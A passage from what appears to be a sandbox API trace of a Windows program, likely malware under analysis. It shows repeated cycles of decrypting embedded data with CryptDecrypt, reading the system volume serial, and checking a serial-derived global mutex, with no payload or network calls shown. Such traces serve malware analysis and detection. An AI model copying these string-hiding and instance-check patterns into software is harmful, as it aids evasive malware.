pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0224.699] CryptDestroyKey (hKey=0x29c020) returned 1 [0224.699] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0224.699] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9690, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0224.699] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0224.699] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0224.699] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0224.699] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0224.699] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0224.699] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0224.699] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0224.699] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0224.699] CryptDestroyKey (hKey=0x29c020) returned 1 [0224.700] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0224.700] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0224.700] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0224.700] CloseHandle (hObject=0x1c0) returned 1 [0224.700] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0224.700] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0226.036] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0226.036] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0226.036] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9690, pdwDataLen=0x200faf4 | out: pbData=0x1db9690, pdwDataLen=0x200faf4) returned 1 [0226.036] CryptDestroyKey (hKey=0x29c020) returned 1 [0226.036] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9668 [0226.037] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0226.037] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0226.037] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0226.037] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0226.037] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0226.037] CryptDestroyKey (hKey=0x29c020) returned 1 [0226.037] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0226.037] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9668, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0226.037] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0226.037] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0226.037] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0226.037] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0226.037] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0226.037] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0226.037] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0226.037] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0226.037] CryptDestroyKey (hKey=0x29c020) returned 1 [0226.037] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0226.037] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0226.037] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0226.037] CloseHandle (hObject=0x1c0) returned 1 [0226.037] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0226.038] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0227.050] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0227.050] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0227.050] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9668, pdwDataLen=0x200faf4 | out: pbData=0x1db9668, pdwDataLen=0x200faf4) returned 1 [0227.050] CryptDestroyKey (hKey=0x29c020) returned 1 [0227.050] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9690 [0227.050] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0227.050] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0227.051] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0227.051] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0227.051] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0227.051] CryptDestroyKey (hKey=0x29c020) returned 1 [0227.051] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0227.051] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9690, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0227.051] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0227.051] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0227.051] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0227.051] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0227.051] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0227.051] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0227.051] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0227.051] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0227.051] CryptDestroyKey (hKey=0x29c020) returned 1 [0227.051] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0227.051] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0227.051] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0227.051] CloseHandle (hObject=0x1c0) returned 1 [0227.051] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0227.052] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0228.206] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0228.206] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0228.206] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9690, pdwDataLen=0x200faf4 | out: pbData=0x1db9690, pdwDataLen=0x200faf4) returned 1 [0228.206] CryptDestroyKey (hKey=0x29c020) returned 1 [0228.206] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9668 [0228.206] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0228.206] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0228.206] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0228.206] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0228.206] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0228.206] CryptDestroyKey (hKey=0x29c020) returned 1 [0228.206] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0228.206] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9668, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0228.206] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0228.206] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0228.206] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0228.206] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0228.206] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0228.206] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0228.206] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0228.206] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0228.206] CryptDestroyKey (hKey=0x29c020) returned 1 [0228.206] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0228.206] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0228.207] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0228.207] CloseHandle (hObject=0x1c0) returned 1 [0228.207] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0228.207] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0229.250] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0229.250] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0229.250] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9668, pdwDataLen=0x200faf4 | out: pbData=0x1db9668, pdwDataLen=0x200faf4) returned 1 [0229.250] CryptDestroyKey (hKey=0x29c020) returned 1 [0229.250] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9690 [0229.250] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0229.250] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0229.250] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0229.250] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0229.250] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0229.250] CryptDestroyKey (hKey=0x29c020) returned 1 [0229.251] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0229.251] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9690, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0229.251] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0229.251] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0229.251] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0229.251] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0229.251] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0229.251] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0229.251] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0229.251] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0229.251] CryptDestroyKey (hKey=0x29c020) returned 1 [0229.251] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0229.251] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0229.251] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0229.252] CloseHandle (hObject=0x1c0) returned 1 [0229.252] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0229.252] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0230.265] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0230.265] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0230.265] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9690, pdwDataLen=0x200faf4 | out: pbData=0x1db9690, pdwDataLen=0x200faf4) returned 1 [0230.265] CryptDestroyKey (hKey=0x29c020) returned 1 [0230.265] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9668 [0230.265] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0230.265] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0230.265] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0230.265] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0230.265] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0230.265] CryptDestroyKey (hKey=0x29c020) returned 1 [0230.265] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0230.265] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9668, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0230.265] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0230.265] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0230.265] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0230.266] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0230.266] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0230.266] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0230.266] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0230.266] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0230.266] CryptDestroyKey (hKey=0x29c020) returned 1 [0230.266] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0230.266] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0230.266] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0230.266] CloseHandle (hObject=0x1c0) returned 1 [0230.266] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0230.266] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0231.278] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0231.278] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0231.278] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9668, pdwDataLen=0x200faf4 | out: pbData=0x1db9668, pdwDataLen=0x200faf4) returned 1 [0231.278] CryptDestroyKey (hKey=0x29c020) returned 1 [0231.278] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9690 [0231.278] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0231.278] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0231.278] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0231.278] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0231.278] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0231.278] CryptDestroyKey (hKey=0x29c020) returned 1 [0231.278] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0231.278] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9690, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0231.278] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0231.278] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0231.278] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0231.279] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0231.279] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0231.279] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0231.279] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0231.279] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0231.279] CryptDestroyKey (hKey=0x29c020) returned 1 [0231.279] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0231.279] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0231.279] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0231.279] CloseHandle (hObject=0x1c0) returned 1 [0231.279] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0231.279] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0232.293] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0232.293] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0232.293] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9690, pdwDataLen=0x200faf4 | out: pbData=0x1db9690, pdwDataLen=0x200faf4) returned 1 [0232.293] CryptDestroyKey (hKey=0x29c020) returned 1 [0232.293] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9668 [0232.293] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0232.294] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0232.294] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0232.294] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0232.294] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0232.294] CryptDestroyKey (hKey=0x29c020) returned 1 [0232.294] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0232.294] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9668, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0232.294] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0232.294] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: 